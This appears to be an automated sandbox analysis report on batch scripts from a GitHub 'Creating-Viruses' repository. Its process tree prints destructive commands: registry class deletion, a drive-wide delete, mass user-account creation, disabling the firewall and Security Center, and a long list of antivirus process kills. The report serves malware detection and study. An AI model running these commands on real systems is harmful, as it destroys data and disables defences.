Analysis
-
max time kernel
196s -
max time network
193s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
30-05-2024 08:23
General
-
Target
https://github.com/AshStudios/Creating-Viruses/blob/master/process_creator.bat
Malware Config
Signatures
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 2 IoCs
-
Modifies registry class 60 IoCs
-
Runs net.exe
-
Runs regedit.exe 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/AshStudios/Creating-Viruses/blob/master/process_creator.bat1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe8e00ab58,0x7ffe8e00ab68,0x7ffe8e00ab782⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1624 --field-trial-handle=1932,i,2301630291226333217,10556840832910635958,131072 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1932,i,2301630291226333217,10556840832910635958,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2244 --field-trial-handle=1932,i,2301630291226333217,10556840832910635958,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3068 --field-trial-handle=1932,i,2301630291226333217,10556840832910635958,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3076 --field-trial-handle=1932,i,2301630291226333217,10556840832910635958,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4436 --field-trial-handle=1932,i,2301630291226333217,10556840832910635958,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4564 --field-trial-handle=1932,i,2301630291226333217,10556840832910635958,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4900 --field-trial-handle=1932,i,2301630291226333217,10556840832910635958,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 --field-trial-handle=1932,i,2301630291226333217,10556840832910635958,131072 /prefetch:82⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Registery_deleter.bat" "2⤵
-
C:\Windows\system32\reg.exereg delete HKCR/.exe3⤵
-
-
C:\Windows\system32\reg.exereg delete HKCR/.dll3⤵
-
-
C:\Windows\system32\reg.exereg delete HKCR/*3⤵
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4908 --field-trial-handle=1932,i,2301630291226333217,10556840832910635958,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5080 --field-trial-handle=1932,i,2301630291226333217,10556840832910635958,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5160 --field-trial-handle=1932,i,2301630291226333217,10556840832910635958,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 --field-trial-handle=1932,i,2301630291226333217,10556840832910635958,131072 /prefetch:82⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Os_deleter.bat" "2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Del C:\ *.* "3⤵
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=740 --field-trial-handle=1932,i,2301630291226333217,10556840832910635958,131072 /prefetch:82⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\useraccount_flooder.bat" "2⤵
-
C:\Windows\system32\net.exenet user 25385 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 25385 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 1259 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 1259 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 14709 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 14709 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 26395 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 26395 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 29258 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 29258 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 29319 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 29319 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 12769 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 12769 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 849 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 849 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 12659 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 12659 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 3305 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 3305 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 8548 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 8548 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 9738 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 9738 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 28101 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 28101 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 444 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 444 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 32719 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 32719 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 9567 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 9567 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 11332 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 11332 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 27653 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 27653 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 15840 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 15840 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 10664 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 10664 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 17465 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 17465 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 5371 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 5371 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 21187 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 21187 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 5359 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 5359 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 30933 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 30933 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 14105 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 14105 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 17112 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 17112 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 32420 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 32420 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 22038 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 22038 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 30577 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 30577 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 951 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 951 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 6033 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 6033 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 21743 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 21743 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 2371 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 2371 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 24946 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 24946 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 2577 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 2577 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 2723 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 2723 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 12238 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 12238 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 18714 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 18714 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 10877 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 10877 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 26482 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 26482 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 4710 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 4710 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 7300 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 7300 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 3048 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 3048 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 18551 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 18551 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 5831 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 5831 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 29516 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 29516 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 19724 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 19724 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 24785 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 24785 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 13737 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 13737 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 27931 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 27931 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 12675 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 12675 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 15873 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 15873 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 32149 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 32149 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 31014 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 31014 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 23355 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 23355 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 27539 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 27539 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 14326 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 14326 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 14071 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 14071 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 14372 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 14372 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 31233 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 31233 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 25715 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 25715 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 21616 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 21616 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 30763 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 30763 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 27860 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 27860 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 32380 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 32380 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 3341 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 3341 /add4⤵
-
-
-
C:\Windows\system32\net.exenet user 8044 /add3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user 8044 /add4⤵
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4936 --field-trial-handle=1932,i,2301630291226333217,10556840832910635958,131072 /prefetch:82⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Antivirus Disabler.bat" "2⤵
-
C:\Windows\system32\net.exenet stop ΓÇ£Security CenterΓÇ¥3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ΓÇ£Security CenterΓÇ¥4⤵
-
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
-
-
C:\Windows\system32\tskill.exetskill /A av*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A fire*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A anti*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A spy*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A bullguard3⤵
-
-
C:\Windows\system32\tskill.exetskill /A PersFw3⤵
-
-
C:\Windows\system32\tskill.exetskill /A KAV*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A ZONEALARM3⤵
-
-
C:\Windows\system32\tskill.exetskill /A SAFEWEB3⤵
-
-
C:\Windows\system32\tskill.exetskill /A spy*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A bullguard3⤵
-
-
C:\Windows\system32\tskill.exetskill /A PersFw3⤵
-
-
C:\Windows\system32\tskill.exetskill /A KAV*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A ZONEALARM3⤵
-
-
C:\Windows\system32\tskill.exetskill /A SAFEWEB3⤵
-
-
C:\Windows\system32\tskill.exetskill /A OUTPOST3⤵
-
-
C:\Windows\system32\tskill.exetskill /A nv*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A nav*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A F-*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A ESAFE3⤵
-
-
C:\Windows\system32\tskill.exetskill /A cle3⤵
-
-
C:\Windows\system32\tskill.exetskill /A BLACKICE3⤵
-
-
C:\Windows\system32\tskill.exetskill /A def*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A kav3⤵
-
-
C:\Windows\system32\tskill.exetskill /A kav*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A avg*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A ash*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A aswupdsv3⤵
-
-
C:\Windows\system32\tskill.exetskill /A ewid*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A guard*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A guar*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A gcasDt*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A msmp*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A mcafe*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A mghtml3⤵
-
-
C:\Windows\system32\tskill.exetskill /A msiexec3⤵
-
-
C:\Windows\system32\tskill.exetskill /A outpost3⤵
-
-
C:\Windows\system32\tskill.exetskill /A isafe3⤵
-
-
C:\Windows\system32\tskill.exetskill /A zap*cls3⤵
-
-
C:\Windows\system32\tskill.exetskill /A zauinst3⤵
-
-
C:\Windows\system32\tskill.exetskill /A upd*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A zlclien*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A minilog3⤵
-
-
C:\Windows\system32\tskill.exetskill /A cc*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A norton*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A norton au*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A ccc*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A npfmn*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A loge*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A nisum*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A issvc3⤵
-
-
C:\Windows\system32\tskill.exetskill /A tmp*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A tmn*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A pcc*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A cpd*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A pop*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A pav*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A padmincls3⤵
-
-
C:\Windows\system32\tskill.exetskill /A panda*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A avsch*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A sche*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A syman*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A virus*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A realm*cls3⤵
-
-
C:\Windows\system32\tskill.exetskill /A sweep*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A scan*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A ad-*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A safe*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A avas*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A norm*3⤵
-
-
C:\Windows\system32\tskill.exetskill /A offg*3⤵
-
-
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Windows\regedit.exe"C:\Windows\regedit.exe"1⤵
- Runs regedit.exe
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault03de5ff4h8576h480eh9ad0h975d2d45e8071⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffe7df246f8,0x7ffe7df24708,0x7ffe7df247182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1976,15248360108717917977,183893111945809623,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2016 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1976,15248360108717917977,183893111945809623,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2568 /prefetch:32⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1976,15248360108717917977,183893111945809623,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:82⤵
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD56ec130ac874a5ffbeac286c699f80755
SHA174bf509aeb6ca22f053751322f337009b05f2f3f
SHA256df5b27dbdf259b863faa36fcdc04ba611f19364b8d2dbbceaff9d44f0e780ca8
SHA512d9305d52666cafef40a602d52ca509c8e2a8395b402f3be995f347a616fc664462987e1d6cf10e29d051f8a99288a2247b7152ad73c84b50102c41fea3452419
-
Filesize
1KB
MD5001bc72a09ac1b642e5fb0e8a27f4de5
SHA1f6007322a621539f98e8e1ef87a152ff8c4de779
SHA25622e5948beb040b1e6c93c870d469428a349f8b679468008eeec542a476328f15
SHA512665e9c0107607581b7c3fd4f9afe56aff7739bb85db50e4a8782ff5f9c132f48b0cdb08d681a082b0e471f9a942460d36c888e83a526a75dc520b6d27a36afb8
-
Filesize
264KB
MD5a42da46fc3f438f55bb0f0e05ea49bdb
SHA1626dfa8e220ee9fc7d776b2f6bc8221068e64ef8
SHA256a1b8c8216c510400512d9ceaacf538df36d75744bbf0fd56d031c072ed65928c
SHA5122ffbc8c12a74ed6d8454e01e71aad5648a9ae713e9eab112a398f89cba699c9c000dcb91c62bbe3795ab3c243ba905b95318380e114066ea3e02a677e4036c94
-
Filesize
2KB
MD583b8c437857643a3595144e253a4c1f3
SHA12755fd9c103cdbfe16a7b7ce029bbeab94e2654d
SHA2562228acdad133abb54382a4982d58860a3bee2950bf34fc890b83fe264f93d83e
SHA5121149668662344a08030d5ed604956494ab5aecc93078cfe1304ef110abcceb1514e0b86bb871f5c85aeb2ec970cf3aff60f50651daeffc9a7cba0cd4d0fda4b1
-
Filesize
2KB
MD5d67f646c825f96eb8c335de34aa74853
SHA11e0199904acb2ab2b72d168501798611c01da4d6
SHA256caa468e04ada80e3aed5fd2107b197ee40dba459ddec190c843ddc7d699b3801
